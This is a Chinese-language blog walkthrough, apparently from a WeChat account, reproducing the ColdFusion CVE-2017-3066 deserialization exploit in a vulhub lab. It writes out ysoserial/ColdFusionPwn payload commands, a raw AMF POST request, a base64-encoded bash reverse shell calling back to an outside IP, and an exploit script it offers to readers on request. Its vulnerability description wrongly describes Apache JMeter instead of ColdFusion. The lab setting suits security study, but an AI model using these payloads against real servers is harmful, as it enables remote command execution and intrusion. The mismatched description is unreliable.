一、环境搭建:
进入镜像目录:
cd vulhub/coldfusion/CVE-2017-3066
启动环境:
docker-compose up -d
访问如下页面,并且输入密码:vulhub即可完成搭建:
二、漏洞描述:
Apache JMeter是美国阿帕奇(Apache)软件基金会的一套使用Java语言编写的用于压力测试和性能测试的开源软件。其2.x版本和3.x版本中存在反序列化漏洞,攻击者可以利用该漏洞在目标服务器上执行任意命令
三、漏洞复现:
1、使用ColdFusionPwn.jar,生成poc:
下载链接:
https://github.com/codewhitesec/ColdFusionPwn/releases/download/0.0.1/ColdFusionPwn-0.0.1-SNAPSHOT-all.jar
java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'touch /tmp/CVE-2017-3066_success' poc.ser
会在当前目录下生成一个poc.ser文件:
2、构造如下post数据包:
POST /flex2gateway/amf HTTP/1.1
Host: 192.168.136.140:8500
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-amf
Content-Length: 0
...poc...
选择:Paste From File,粘贴poc.ser的内容到post数据中:
然后发送请求:
成功创建文件:
3、反弹shell:
将命令改为反弹shell的payload,并且使用:http://www.jackson-t.ca/runtime-exec-payloads.html,进行编码:
java -cp ColdFusionPwn.jar:ysoserial.jar com.codewhitesec.coldfusionpwn.ColdFusionPwner -e CommonsBeanutils1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEzNi4xMjkvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}' poc2.ser
然后利用ColdFusionPwn.jar生成ser文件即可:
和上面一样,使用burp发送请求即可:
成功收到反弹shell:
四、漏洞EXP
需要配合ColdFusionPwn.jar生成ser文件:
python3 CVE-2017-3066_EXP.py http://192.168.136.140:8500 -f poc2.ser
使用脚本将ser文件发送
成功收到反弹shell:
脚本已经打包好了,需要的看官后台留言:coldFusion exp,链接有效期为7天,请注意保存,请仅用于学习研究!
各位师傅可以加好友一起学习交流交个朋友,如果之前分享的exp失效了,也可以加我好友py一下:qq:1254311935
备注:公众号+师傅们的id吧
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
注意:脚本仅作为学习和讨论使用,禁止利用其进行任何违法行为,与作者无关!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论